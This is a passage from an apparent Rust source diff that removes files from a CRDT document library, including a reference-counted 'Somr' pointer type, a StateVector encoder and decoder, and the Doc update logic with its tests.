assert_eq!(ranges, vec![]);
}
{
let old = OrderRange::Range(0..10);
let new = OrderRange::Range(0..11);
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(10..11)]);
}
{
let old: OrderRange = vec![(0..10), (20..30)].into();
let new: OrderRange = vec![(0..15), (20..30)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(10..15)]);
}
{
let old: OrderRange = vec![(0..3), (5..7), (8..10), (16..18), (21..23)].into();
let new: OrderRange = vec![(0..12), (15..23)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(3..5), (7..8), (10..12), (15..16), (18..21)]);
}
{
let old: OrderRange = vec![(1..6), (8..12)].into();
let new: OrderRange = vec![(0..12), (15..23), (24..28)].into();
let ranges = old.diff_range(&new);
assert_eq!(ranges, vec![(0..1), (6..8), (15..23), (24..28)]);
}
}
#[test]
fn test_range_extend() {
let mut range: OrderRange = (0..10).into();
range.merge((20..30).into());
assert_eq!(range, OrderRange::from(vec![(0..10), (20..30)]));
let mut range: OrderRange = (0..10).into();
range.merge(vec![(10..15), (20..30)].into());
assert_eq!(range, OrderRange::from(vec![(0..15), (20..30)]));
let mut range: OrderRange = vec![(0..10), (20..30)].into();
range.merge((10..20).into());
assert_eq!(range, OrderRange::Range(0..30));
let mut range: OrderRange = vec![(0..10), (20..30)].into();
range.merge(vec![(10..20), (30..40)].into());
assert_eq!(range, OrderRange::Range(0..40));
}
#[test]
fn iter() {
let range: OrderRange = vec![(0..10), (20..30)].into();
assert_eq!(range.into_iter().collect::<Vec<_>>(), vec![(0..10), (20..30)]);
let range: OrderRange = OrderRange::Range(0..10);
assert_eq!(range.into_iter().collect::<Vec<_>>(), vec![(0..10)]);
}
}
@@ -1,516 +0,0 @@
use std::{
cell::UnsafeCell,
fmt::{self, Write},
hash::{Hash, Hasher},
marker::PhantomData,
mem,
ops::{Deref, DerefMut},
ptr::NonNull,
};
use crate::sync::Ordering;
const DANGLING_PTR: usize = usize::MAX;
#[inline]
fn is_dangling<T>(ptr: NonNull<T>) -> bool {
ptr.as_ptr() as usize == DANGLING_PTR
}
/// Heap data with single owner but multiple refs with dangling checking at
/// runtime.
pub(crate) enum Somr<T> {
Owned(Owned<T>),
Ref(Ref<T>),
}
#[repr(transparent)]
pub(crate) struct Owned<T>(NonNull<SomrInner<T>>);
#[repr(transparent)]
pub(crate) struct Ref<T>(NonNull<SomrInner<T>>);
#[cfg(feature = "large_refs")]
type RefAtomicType = crate::sync::AtomicU32;
#[cfg(feature = "large_refs")]
type RefPrimitiveType = u32;
#[cfg(not(feature = "large_refs"))]
type RefAtomicType = crate::sync::AtomicU16;
#[cfg(not(feature = "large_refs"))]
type RefPrimitiveType = u16;
pub(crate) struct SomrInner<T> {
data: Option<UnsafeCell<T>>,
/// increase the size when we really meet the the scenario with refs more
/// then u16::MAX(65535) times
refs: RefAtomicType,
_marker: PhantomData<Option<T>>,
}
pub(crate) struct InnerRefMut<'a, T> {
inner: NonNull<T>,
_marker: PhantomData<&'a mut T>,
}
impl<T> Deref for InnerRefMut<'_, T> {
type Target = T;
fn deref(&self) -> &Self::Target {
unsafe { &*self.inner.as_ptr() }
}
}
impl<T> DerefMut for InnerRefMut<'_, T> {
fn deref_mut(&mut self) -> &mut Self::Target {
unsafe { &mut *self.inner.as_ptr() }
}
}
unsafe impl<T: Send> Send for Somr<T> {}
unsafe impl<T: Sync> Sync for Somr<T> {}
impl<T> Default for Somr<T> {
fn default() -> Self {
Self::none()
}
}
impl<T> Somr<T> {
pub fn new(data: T) -> Self {
let inner = Box::new(SomrInner {
data: Some(UnsafeCell::new(data)),
refs: RefAtomicType::new(1),
_marker: PhantomData,
});
Self::Owned(Owned(Box::leak(inner).into()))
}
pub fn none() -> Self {
Self::Ref(Ref(NonNull::new(DANGLING_PTR as *mut _).unwrap()))
}
}
impl<T> SomrInner<T> {
fn data_ref(&self) -> Option<&T> {
self.data.as_ref().map(|x| unsafe { &*x.get() })
}
fn data_mut(&self) -> Option<InnerRefMut<'_, T>> {
self.data.as_ref().map(|x| InnerRefMut {
inner: unsafe { NonNull::new_unchecked(x.get()) },
_marker: PhantomData,
})
}
}
impl<T> Somr<T> {
#[inline]
pub fn is_none(&self) -> bool {
self.dangling() || self.inner().data_ref().is_none()
}
#[inline]
pub fn is_some(&self) -> bool {
!self.dangling() && self.inner().data_ref().is_some()
}
pub fn get(&self) -> Option<&T> {
if self.dangling() {
return None;
}
self.inner().data_ref()
}
pub unsafe fn get_unchecked(&self) -> &T {
if self.dangling() {
panic!("Try to visit Somr data that has already been dropped.")
}
match &self.inner().data_ref() {
Some(data) => data,
None => {
panic!("Try to unwrap on None")
}
}
}
#[allow(unused)]
pub fn get_mut(&mut self) -> Option<&mut T> {
if !self.is_owned() || self.dangling() {
return None;
}
let inner = self.inner_mut();
inner.data.as_mut().map(|x| x.get_mut())
}
#[allow(unused)]
pub unsafe fn get_mut_from_ref(&self) -> Option<InnerRefMut<'_, T>> {
if !self.is_owned() || self.dangling() {
return None;
}
let inner = self.inner_mut();
inner.data_mut()
}
pub unsafe fn get_mut_unchecked(&self) -> InnerRefMut<'_, T> {
if self.dangling() {
panic!("Try to visit Somr data that has already been dropped.")
}
match self.inner_mut().data_mut() {
Some(data) => data,
None => {
panic!("Try to unwrap on None")
}
}
}
#[inline]
pub fn is_owned(&self) -> bool {
matches!(self, Self::Owned(_))
}
pub fn swap_take(&mut self) -> Self {
debug_assert!(self.is_owned());
let mut r = self.clone();
mem::swap(self, &mut r);
r
}
#[inline]
fn inner(&self) -> &SomrInner<T> {
debug_assert!(!self.dangling());
unsafe { self.ptr().as_ref() }
}
#[inline]
#[allow(clippy::mut_from_ref)]
fn inner_mut(&self) -> &mut SomrInner<T> {
debug_assert!(!self.dangling());
unsafe { self.ptr().as_mut() }
}
#[inline]
pub fn ptr(&self) -> NonNull<SomrInner<T>> {
match self {
Somr::Owned(ptr) => ptr.0,
Somr::Ref(ptr) => ptr.0,
}
}
#[inline]
pub fn ptr_eq(&self, other: &Self) -> bool {
std::ptr::eq(self.ptr().as_ptr(), other.ptr().as_ptr())
}
#[inline]
fn dangling(&self) -> bool {
is_dangling(self.ptr())
}
}
impl<T> Clone for Somr<T> {
fn clone(&self) -> Self {
if self.dangling() {
return Self::none();
}
let inner = unsafe { &*self.ptr().as_ptr() };
let old_size = inner.refs.fetch_add(1, Ordering::Relaxed);
if old_size == RefPrimitiveType::MAX {
panic!("Too many refs on Somr, maybe we need to increase the limitation now.")
}
Self::Ref(Ref(self.ptr()))
}
}
impl<T> Drop for Owned<T> {
fn drop(&mut self) {
let inner = unsafe { &mut *self.0.as_ptr() };
// ensure all reads are finished
// See [Arc::Drop]
inner.refs.load(Ordering::Acquire);
inner.data.take();
drop(Ref(self.0));
}
}
impl<T> Drop for Ref<T> {
fn drop(&mut self) {
if is_dangling(self.0) {
return;
}
let rc = unsafe { &(*self.0.as_ptr()).refs };
// no other refs
if rc.fetch_sub(1, Ordering::Release) == 1 {
// ensure all reads are finished
// See [Arc::Drop]
rc.load(Ordering::Acquire);
drop(unsafe { Box::from_raw(self.0.as_ptr()) });
}
}
}
impl<T> From<T> for Somr<T> {
fn from(value: T) -> Self {
Somr::new(value)
}
}
impl<T> From<Option<Somr<T>>> for Somr<T> {
fn from(value: Option<Somr<T>>) -> Self {
value.unwrap_or_default()
}
}
pub trait FlattenGet<T> {
#[allow(dead_code)]
fn flatten_get(&self) -> Option<&T>;
}
impl<T> FlattenGet<T> for Option<Somr<T>> {
fn flatten_get(&self) -> Option<&T> {
self.as_ref().and_then(|data| data.get())
}
}
impl<T: PartialEq> PartialEq for Somr<T> {
fn eq(&self, other: &Self) -> bool {
self.ptr() == other.ptr() || !self.dangling() && !other.dangling() && self.inner() == other.inner()
}
}
impl<T: PartialEq> PartialEq for SomrInner<T> {
fn eq(&self, other: &Self) -> bool {
self.data_ref() == other.data_ref()
}
}
impl<T: Eq> Eq for Somr<T> {}
impl<T: PartialOrd> PartialOrd for Somr<T> {
fn partial_cmp(&self, other: &Self) -> Option<std::cmp::Ordering> {
match (self.get(), other.get()) {
(Some(a), Some(b)) => a.partial_cmp(b),
_ => None,
}
}
}
impl<T> Hash for Somr<T> {
fn hash<H: Hasher>(&self, state: &mut H) {
self.ptr().hash(state)
}
}
impl<T: fmt::Debug> fmt::Debug for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
if self.is_owned() {
f.write_str("Owned(")?;
} else {
f.write_str("Ref(")?;
}
if let Some(value) = self.get() {
fmt::Debug::fmt(value, f)?;
} else {
f.write_str("None")?;
}
f.write_char(')')
}
}
impl<T: fmt::Display> fmt::Display for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
if self.is_owned() {
f.write_str("Owned(")?;
} else {
f.write_str("Ref(")?;
}
if let Some(value) = self.get() {
fmt::Display::fmt(value, f)?;
} else {
f.write_str("None")?;
}
f.write_char(')')
}
}
impl<T: Sized> fmt::Pointer for Somr<T> {
fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
fmt::Pointer::fmt(&(self.get().unwrap() as *const T), f)
}
}
#[cfg(all(test, not(loom)))]
impl<T: proptest::arbitrary::Arbitrary> proptest::arbitrary::Arbitrary for Somr<T> {
type Parameters = T::Parameters;
type Strategy = proptest::strategy::MapInto<T::Strategy, Self>;
fn arbitrary_with(args: Self::Parameters) -> Self::Strategy {
proptest::strategy::Strategy::prop_map_into(proptest::arbitrary::any_with::<T>(args))
}
}
#[cfg(test)]
mod tests {
use super::*;
use crate::loom_model;
#[test]
fn basic_example() {
loom_model!({
let five = Somr::new(5);
assert_eq!(five.get(), Some(&5));
let five_ref = five.clone();
assert!(!five_ref.is_owned());
assert_eq!(five_ref.get(), Some(&5));
assert_eq!(five_ref.ptr().as_ptr() as usize, five.ptr().as_ptr() as usize);
drop(five);
// owner released
assert_eq!(five_ref.get(), None);
});
}
#[test]
fn complex_struct() {
loom_model!({
struct T {
a: usize,
b: String,
}
let t1 = Somr::new(T {
a: 1,
b: "hello".to_owned(),
});
assert_eq!(t1.get().unwrap().a, 1);
assert_eq!(t1.get().unwrap().b.as_str(), "hello");
let t2 = t1.clone();
assert!(!t2.is_owned());
assert_eq!(t2.ptr().as_ptr() as usize, t1.ptr().as_ptr() as usize);
assert_eq!(t2.get().unwrap().a, 1);
assert_eq!(t2.get().unwrap().b.as_str(), "hello");
drop(t1);
assert!(t2.get().is_none());
});
}
#[test]
fn acquire_mut_ref() {
loom_model!({
let mut five = Somr::new(5);
*five.get_mut().unwrap() += 1;
assert_eq!(five.get(), Some(&6));
let five_ref = five.clone();
// only owner can mut ref
assert!(five_ref.get().is_some());
assert!(unsafe { five_ref.get_mut_from_ref() }.is_none());
drop(five);
});
}
#[test]
fn comparison() {
loom_model!({
let five = Somr::new(5);
let five_ref = five.clone();
let another_five = Somr::new(5);
let six = Somr::new(6);
assert_eq!(five, five_ref);
assert_eq!(five, another_five);
assert_eq!(five.ptr().as_ptr(), five_ref.ptr().as_ptr());
assert_ne!(five.ptr().as_ptr(), another_five.ptr().as_ptr());
assert!(six > five);
assert!(six > five_ref);
assert_eq!(five_ref.partial_cmp(&six), Some(std::cmp::Ordering::Less));
drop(five);
assert_eq!(five_ref.partial_cmp(&six), None);
});
}
#[test]
fn represent_none() {
loom_model!({
let none = Somr::<u32>::none();
assert!(!none.is_owned());
assert!(none.is_none());
assert!(none.get().is_none());
});
}
#[test]
fn drop_ref_without_affecting_owner() {
loom_model!({
let five = Somr::new(5);
let five_ref = five.clone();
assert_eq!(five.get().unwrap(), &5);
assert_eq!(five_ref.get().unwrap(), &5);
drop(five_ref);
assert_eq!(five.get().unwrap(), &5);
});
}
#[test]
fn swap_take() {
loom_model!({
let mut five = Somr::new(5);
let owned = five.swap_take();
assert_eq!(owned.get().unwrap(), &5);
assert_eq!(five.get().unwrap(), &5);
assert!(owned.is_owned());
assert!(!five.is_owned());
});
}
// This is UB if we didn't use `UnsafeCell` in `Somr`
#[test]
fn test_inner_mut() {
loom_model!({
let five = Somr::new(5);
fn add(a: &Somr<i32>, b: &Somr<i32>) {
unsafe { a.get_mut_from_ref() }
.map(|mut x| *x += *b.get().unwrap())
.unwrap();
}
add(&five, &five);
assert_eq!(five.get().copied().unwrap(), 10);
});
}
}
@@ -1,140 +0,0 @@
use std::ops::{Deref, DerefMut};
use super::{
Client, ClientMap, Clock, CrdtRead, CrdtReader, CrdtWrite, CrdtWriter, HASHMAP_SAFE_CAPACITY, HashMapExt, Id,
JwstCodecResult,
};
#[derive(Default, Debug, PartialEq, Clone)]
pub struct StateVector(ClientMap<Clock>);
impl StateVector {
pub fn set_max(&mut self, client: Client, clock: Clock) {
self
.entry(client)
.and_modify(|m_clock| {
if *m_clock < clock {
*m_clock = clock;
}
})
.or_insert(clock);
}
pub fn get(&self, client: &Client) -> Clock {
*self.0.get(client).unwrap_or(&0)
}
pub fn contains(&self, id: &Id) -> bool {
id.clock <= self.get(&id.client)
}
pub fn set_min(&mut self, client: Client, clock: Clock) {
self
.entry(client)
.and_modify(|m_clock| {
if *m_clock > clock {
*m_clock = clock;
}
})
.or_insert(clock);
}
pub fn iter(&self) -> impl Iterator<Item = (&Client, &Clock)> {
self.0.iter()
}
pub fn merge_with(&mut self, other: &Self) {
for (client, clock) in other.iter() {
self.set_min(*client, *clock);
}
}
}
impl Deref for StateVector {
type Target = ClientMap<Clock>;
fn deref(&self) -> &Self::Target {
&self.0
}
}
impl DerefMut for StateVector {
fn deref_mut(&mut self) -> &mut Self::Target {
&mut self.0
}
}
impl<const N: usize> From<[(Client, Clock); N]> for StateVector {
fn from(value: [(Client, Clock); N]) -> Self {
let mut map = ClientMap::with_capacity(N);
for (client, clock) in value {
map.insert(client, clock);
}
Self(map)
}
}
impl<R: CrdtReader> CrdtRead<R> for StateVector {
fn read(decoder: &mut R) -> JwstCodecResult<Self> {
let len = decoder.read_var_u64()? as usize;
// See: [HASHMAP_SAFE_CAPACITY]
let mut map = ClientMap::with_capacity(len.min(HASHMAP_SAFE_CAPACITY));
for _ in 0..len {
let client = decoder.read_var_u64()?;
let clock = decoder.read_var_u64()?;
map.insert(client, clock);
}
map.shrink_to_fit();
Ok(Self(map))
}
}
impl<W: CrdtWriter> CrdtWrite<W> for StateVector {
fn write(&self, encoder: &mut W) -> JwstCodecResult {
encoder.write_var_u64(self.len() as u64)?;
for (client, clock) in self.iter() {
encoder.write_var_u64(*client)?;
encoder.write_var_u64(*clock)?;
}
Ok(())
}
}
#[cfg(test)]
mod tests {
use super::*;
#[test]
fn test_state_vector_basic() {
let mut state_vector = StateVector::from([(1, 1), (2, 2), (3, 3)]);
assert_eq!(state_vector.len(), 3);
assert_eq!(state_vector.get(&1), 1);
state_vector.set_min(1, 0);
assert_eq!(state_vector.get(&1), 0);
state_vector.set_max(1, 4);
assert_eq!(state_vector.get(&1), 4);
// set inexistent client
state_vector.set_max(4, 1);
assert_eq!(state_vector.get(&4), 1);
// same client with larger clock
assert!(!state_vector.contains(&(1, 5).into()));
}
#[test]
fn test_state_vector_merge() {
let mut state_vector = StateVector::from([(1, 1), (2, 2), (3, 3)]);
let other_state_vector = StateVector::from([(1, 5), (2, 6), (3, 7)]);
state_vector.merge_with(&other_state_vector);
assert_eq!(state_vector, StateVector::from([(3, 3), (1, 1), (2, 2)]));
}
}
@@ -1,726 +0,0 @@
#[cfg(feature = "events")]
use publisher::DocPublisher;
use super::{
history::StoreHistory,
store::{ChangedTypeRefs, StoreRef},
*,
};
use crate::sync::{Arc, RwLock};
#[cfg(feature = "debug")]
#[derive(Debug, Clone)]
pub struct DocStoreStatus {
pub nodes: usize,
pub delete_sets: usize,
pub types: usize,
pub dangling_types: usize,
pub pending_nodes: usize,
}
/// [DocOptions] used to create a new [Doc]
///
/// ```
/// use y_octo::DocOptions;
///
/// let doc = DocOptions::new()
/// .with_client_id(1)
/// .with_guid("guid".into())
/// .auto_gc(true)
/// .build();
///
/// assert_eq!(doc.guid(), "guid")
/// ```
#[derive(Clone, Debug)]
pub struct DocOptions {
pub guid: String,
pub client_id: u64,
pub gc: bool,
}
impl Default for DocOptions {
fn default() -> Self {
if cfg!(any(test, feature = "bench")) {
Self {
client_id: 1,
guid: "test".into(),
gc: true,
}
} else {
Self {
client_id: prefer_small_random(),
guid: nanoid::nanoid!(),
gc: true,
}
}
}
}
impl DocOptions {
pub fn new() -> Self {
Self::default()
}
pub fn with_client_id(mut self, client_id: u64) -> Self {
self.client_id = client_id;
self
}
pub fn with_guid(mut self, guid: String) -> Self {
self.guid = guid;
self
}
pub fn auto_gc(mut self, gc: bool) -> Self {
self.gc = gc;
self
}
pub fn build(self) -> Doc {
Doc::with_options(self)
}
}
impl From<DocOptions> for Any {
fn from(value: DocOptions) -> Self {
Any::Object(HashMap::from_iter([
("gc".into(), value.gc.into()),
("guid".into(), value.guid.into()),
]))
}
}
impl TryFrom<Any> for DocOptions {
type Error = JwstCodecError;
fn try_from(value: Any) -> Result<Self, Self::Error> {
match value {
Any::Object(map) => {
let mut options = DocOptions::default();
for (key, value) in map {
match key.as_str() {
"gc" => {
options.gc = bool::try_from(value)?;
}
"guid" => {
options.guid = String::try_from(value)?;
}
_ => {}
}
}
Ok(options)
}
_ => Err(JwstCodecError::UnexpectedType("Object")),
}
}
}
#[derive(Debug, Clone)]
pub struct Doc {
client_id: u64,
opts: DocOptions,
pub(crate) store: StoreRef,
#[cfg(feature = "events")]
pub publisher: Arc<DocPublisher>,
pub(crate) batch: Somr<Batch>,
}
unsafe impl Send for Doc {}
unsafe impl Sync for Doc {}
impl Default for Doc {
fn default() -> Self {
Doc::new()
}
}
impl PartialEq for Doc {
fn eq(&self, other: &Self) -> bool {
self.client_id == other.client_id
}
}
impl Doc {
pub fn new() -> Self {
Self::with_options(DocOptions::default())
}
pub fn with_options(options: DocOptions) -> Self {
let store = Arc::new(RwLock::new(DocStore::with_client(options.client_id)));
#[cfg(feature = "events")]
let publisher = Arc::new(DocPublisher::new(store.clone()));
Self {
client_id: options.client_id,
opts: options,
store,
#[cfg(feature = "events")]
publisher,
batch: Somr::none(),
}
}
pub fn with_client(client_id: u64) -> Self {
DocOptions::new().with_client_id(client_id).build()
}
pub fn client(&self) -> Client {
self.client_id
}
pub fn set_client(&mut self, client_id: u64) {
self.client_id = client_id;
}
pub fn renew_client(&mut self) {
self.client_id = prefer_small_random();
}
pub fn clients(&self) -> Vec<u64> {
self.store.read().unwrap().clients()
}
pub fn history(&self) -> StoreHistory {
let history = StoreHistory::new(&self.store);
history.resolve();
history
}
#[cfg(feature = "debug")]
pub fn store_status(&self) -> DocStoreStatus {
let store = self.store.read().unwrap();
DocStoreStatus {
nodes: store.total_nodes(),
delete_sets: store.total_delete_sets(),
types: store.total_types(),
dangling_types: store.total_dangling_types(),
pending_nodes: store.total_pending_nodes(),
}
}
pub(crate) fn get_changed(&self) -> ChangedTypeRefs {
self.store.write().unwrap().get_changed()
}
pub fn store_compare(&self, other: &Doc) -> bool {
let store = self.store.read().unwrap();
let other_store = other.store.read().unwrap();
store.deep_compare(&other_store)
}
pub fn options(&self) -> &DocOptions {
&self.opts
}
pub fn guid(&self) -> &str {
self.opts.guid.as_str()
}
// TODO:
// provide a better way instead of `_v1` methods
// when implementing `v2` binary format
pub fn try_from_binary_v1<T: AsRef<[u8]>>(binary: T) -> JwstCodecResult<Self> {
Self::try_from_binary_v1_with_options(binary, DocOptions::default())
}
pub fn try_from_binary_v1_with_options<T: AsRef<[u8]>>(binary: T, options: DocOptions) -> JwstCodecResult<Self> {
let mut doc = Doc::with_options(options);
doc.apply_update_from_binary_v1(binary)?;
Ok(doc)
}
pub fn apply_update_from_binary_v1<T: AsRef<[u8]>>(&mut self, binary: T) -> JwstCodecResult {
let mut decoder = RawDecoder::new(binary.as_ref());
let update = Update::read(&mut decoder)?;
self.apply_update(update)
}
pub fn apply_update(&mut self, mut update: Update) -> JwstCodecResult {
let mut store = self.store.write().unwrap();
let mut retry = false;
loop {
// clone every time to avoid ref count issue
let pending_types = update
.structs
.values()
.flatten()
.filter_map(|n| {
if let Node::Item(item_ref) = n
&& let Some(item) = item_ref.get()
&& let Content::Type(ty) = &item.content
{
Some((item.id, ty.clone()))
} else {
None
}
})
.collect();
for (mut s, offset) in update.iter(store.get_state_vector()) {
if let Node::Item(item) = &mut s {
debug_assert!(item.is_owned());
let mut item = unsafe { item.get_mut_unchecked() };
store.repair(&mut item, self.store.clone(), &pending_types)?;
}
store.integrate(s, offset, None)?;
}
for (client, range) in update.delete_set_iter(store.get_state_vector()) {
store.delete_range(client, range)?;
}
if let Some(mut pending_update) = store.pending.take() {
if pending_update
.missing_state
.iter()
.any(|(client, clock)| *clock < store.get_state(*client))
{
// new update has been applied to the doc, need to re-integrate
retry = true;
}
for (client, range) in pending_update.delete_set_iter(store.get_state_vector()) {
store.delete_range(client, range)?;
}
if update.is_pending_empty() {
update = pending_update;
} else {
// drain all pending state to pending update for later iteration
update.drain_pending_state();
Update::merge_into(&mut update, [pending_update]);
}
} else {
// no pending update at store
// no pending update in current iteration
// thank god, all clean
if update.is_pending_empty() {
break;
} else {
// need to turn all pending state into update for later iteration
update.drain_pending_state();
retry = false;
};
}
// can't integrate any more, save the pending update
if !retry {
if !update.is_empty() {
store.pending.replace(update);
}
break;
}
}
if self.opts.gc {
store.optimize()?;
}
Ok(())
}
pub fn keys(&self) -> Vec<String> {
let store = self.store.read().unwrap();
store.types.keys().cloned().collect()
}
pub fn get_or_create_text<S: AsRef<str>>(&self, name: S) -> JwstCodecResult<Text> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Text)
.set_name(name.as_ref().to_string())
.build()
}
pub fn create_text(&self) -> JwstCodecResult<Text> {
YTypeBuilder::new(self.store.clone()).with_kind(YTypeKind::Text).build()
}
pub fn get_or_create_array<S: AsRef<str>>(&self, str: S) -> JwstCodecResult<Array> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Array)
.set_name(str.as_ref().to_string())
.build()
}
pub fn create_array(&self) -> JwstCodecResult<Array> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Array)
.build()
}
pub fn get_or_create_map<S: AsRef<str>>(&self, str: S) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Map)
.set_name(str.as_ref().to_string())
.build()
}
pub fn create_map(&self) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone()).with_kind(YTypeKind::Map).build()
}
pub fn get_map(&self, str: &str) -> JwstCodecResult<Map> {
YTypeBuilder::new(self.store.clone())
.with_kind(YTypeKind::Map)
.set_name(str.to_string())
.build_exists()
}
pub fn encode_update_v1(&self) -> JwstCodecResult<Vec<u8>> {
self.encode_state_as_update_v1(&StateVector::default())
}
pub fn encode_state_as_update_v1(&self, sv: &StateVector) -> JwstCodecResult<Vec<u8>> {
let update = self.encode_state_as_update(sv)?;
let mut encoder = RawEncoder::default();
update.write(&mut encoder)?;
Ok(encoder.into_inner())
}
pub fn encode_update(&self) -> JwstCodecResult<Update> {
self.encode_state_as_update(&StateVector::default())
}
pub fn encode_state_as_update(&self, sv: &StateVector) -> JwstCodecResult<Update> {
self.store.read().unwrap().diff_state_vector(sv, true)
}
pub fn get_state_vector(&self) -> StateVector {
self.store.read().unwrap().get_state_vector()
}
pub fn get_delete_sets(&self) -> DeleteSet {
self.store.read().unwrap().get_delete_sets()
}
#[cfg(feature = "events")]
pub fn subscribe(&self, cb: impl Fn(&[u8], &[History]) + Sync + Send + 'static) {
self.publisher.subscribe(cb);
}
#[cfg(feature = "events")]
pub fn unsubscribe_all(&self) {
self.publisher.unsubscribe_all();
}
#[cfg(feature = "events")]
pub fn subscribe_count(&self) -> usize {
self.publisher.count()
}
#[cfg(feature = "events")]
pub fn subscriber_count(&self) -> usize {
Arc::<DocPublisher>::strong_count(&self.publisher)
}
pub fn gc(&self) -> JwstCodecResult<()> {
self.store.write().unwrap().optimize()
}
}
#[cfg(test)]
mod tests {
use yrs::{Array, Map, Options, Transact, types::ToJson, updates::decoder::Decode};
use super::*;
#[test]
fn test_encode_state_as_update() {
let yrs_options_left = Options::default();
let yrs_options_right = Options::default();
loom_model!({
let (binary, binary_new) = if cfg!(miri) {
let doc = Doc::new();
let mut map = doc.get_or_create_map("abc").unwrap();
map.insert("a".to_string(), 1).unwrap();
let binary = doc.encode_update_v1().unwrap();
let doc_new = Doc::new();
let mut array = doc_new.get_or_create_array("array").unwrap();
array.insert(0, "array_value").unwrap();
let binary_new = doc.encode_update_v1().unwrap();
(binary, binary_new)
} else {
let yrs_doc = yrs::Doc::with_options(yrs_options_left.clone());
let map = yrs_doc.get_or_insert_map("abc");
let mut trx = yrs_doc.transact_mut();
map.insert(&mut trx, "a", 1);
let binary = trx.encode_update_v1();
let yrs_doc_new = yrs::Doc::with_options(yrs_options_right.clone());
let array = yrs_doc_new.get_or_insert_array("array");
let mut trx = yrs_doc_new.transact_mut();
array.insert(&mut trx, 0, "array_value");
let binary_new = trx.encode_update_v1();
(binary, binary_new)
};
let mut doc = Doc::try_from_binary_v1(binary).unwrap();
let mut doc_new = Doc::try_from_binary_v1(binary_new).unwrap();
let diff_update = doc_new.encode_state_as_update_v1(&doc.get_state_vector()).unwrap();
let diff_update_reverse = doc.encode_state_as_update_v1(&doc_new.get_state_vector()).unwrap();
doc.apply_update_from_binary_v1(diff_update).unwrap();
doc_new.apply_update_from_binary_v1(diff_update_reverse).unwrap();
assert_eq!(doc.encode_update_v1().unwrap(), doc_new.encode_update_v1().unwrap());
});
}
#[test]
#[cfg_attr(any(miri, loom), ignore)]
fn test_array_create() {
let yrs_options = yrs::Options::default();
let json = serde_json::json!([42.0, -42.0, true, false, "hello", "world", [1.0]]);
{
let doc = yrs::Doc::with_options(yrs_options.clone());
let array = doc.get_or_insert_array("abc");
let mut trx = doc.transact_mut();
array.insert(&mut trx, 0, 42);
array.insert(&mut trx, 1, -42);
array.insert(&mut trx, 2, true);
array.insert(&mut trx, 3, false);
array.insert(&mut trx, 4, "hello");
array.insert(&mut trx, 5, "world");
let sub_array = yrs::ArrayPrelim::default();
let sub_array = array.insert(&mut trx, 6, sub_array);
sub_array.insert(&mut trx, 0, 1);
drop(trx);
let config = assert_json_diff::Config::new(assert_json_diff::CompareMode::Strict)
.numeric_mode(assert_json_diff::NumericMode::AssumeFloat);
assert_json_diff::assert_json_matches!(array.to_json(&doc.transact()), json, config);
};
{
let binary = {
let doc = Doc::new();
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, 42).unwrap();
array.insert(1, -42).unwrap();
array.insert(2, true).unwrap();
array.insert(3, false).unwrap();
array.insert(4, "hello").unwrap();
array.insert(5, "world").unwrap();
let mut sub_array = doc.create_array().unwrap();
array.insert(6, sub_array.clone()).unwrap();
// FIXME: array need insert first to compatible with yrs
sub_array.insert(0, 1).unwrap();
doc.encode_update_v1().unwrap()
};
let ydoc = yrs::Doc::with_options(yrs_options);
let array = ydoc.get_or_insert_array("abc");
let mut trx = ydoc.transact_mut();
trx.apply_update(yrs::Update::decode_v1(&binary).unwrap()).unwrap();
let config = assert_json_diff::Config::new(assert_json_diff::CompareMode::Strict)
.numeric_mode(assert_json_diff::NumericMode::AssumeFloat);
assert_json_diff::assert_json_matches!(array.to_json(&trx), json, config);
let mut doc = Doc::new();
let array = doc.get_or_create_array("abc").unwrap();
doc.apply_update_from_binary_v1(binary).unwrap();
let list = array.iter().collect::<Vec<_>>();
assert!(list.len() == 7);
assert!(matches!(list[6], Value::Array(_)));
}
{
let binary_detached = {
let doc = Doc::new();
let mut array = doc.get_or_create_array("abc").unwrap();
array.insert(0, 42).unwrap();
array.insert(1, -42).unwrap();
array.insert(2, true).unwrap();
array.insert(3, false).unwrap();
array.insert(4, "hello").unwrap();
array.insert(5, "world").unwrap();
let mut sub_array = doc.create_array().unwrap();
sub_array.insert(0, 1).unwrap();
array.insert(6, sub_array.clone()).unwrap();
doc.encode_update_v1().unwrap()
};
let detached_doc = Doc::try_from_binary_v1(binary_detached).unwrap();
let detached_array = detached_doc.get_or_create_array("abc").unwrap();
let detached_sub_array = match detached_array.get(6).unwrap() {
Value::Array(arr) => arr,
_ => panic!("expected array at index 6"),
};
assert_eq!(detached_sub_array.get(0).unwrap(), Value::Any(1.0.into()));
}
}
#[test]
#[cfg(feature = "events")]
#[ignore = "inaccurate timing on ci, need for more accurate timing testing"]
fn test_subscribe() {
use crate::sync::{AtomicU8, Ordering};
loom_model!({
let doc = Doc::default();
let doc_clone = doc.clone();
let count = Arc::new(AtomicU8::new(0));
let count_clone1 = count.clone();
let count_clone2 = count.clone();
doc.subscribe(move |_, _| {
count_clone1.fetch_add(1, Ordering::SeqCst);
});
doc_clone.subscribe(move |_, _| {
count_clone2.fetch_add(1, Ordering::SeqCst);
});
doc_clone.get_or_create_array("abc").unwrap().insert(0, 42).unwrap();
// wait observer, cycle once every 100mm
std::thread::sleep(std::time::Duration::from_millis(200));
assert_eq!(count.load(Ordering::SeqCst), 2);
});
}
#[test]
fn test_repeated_applied_pending_update() {
// generate a pending update
// update: [1, 1, 1, 0, 39, 1, 4, 116, 101, 115, 116, 3, 109, 97, 112, 1, 0]
// update: [1, 1, 1, 1, 40, 0, 1, 0, 11, 115, 117, 98, 95, 109, 97, 112, 95,
// 107, 101, 121, 1, 119, 13, 115, 117, 98, 95, 109, 97, 112, 95, 118, 97, 108,
// 117, 101, 0]
// {
// let doc1 = Doc::default();
// doc1.subscribe(|update| {
// println!("update: {:?}", update);
// });
// let mut map = doc1.get_or_create_map("test").unwrap();
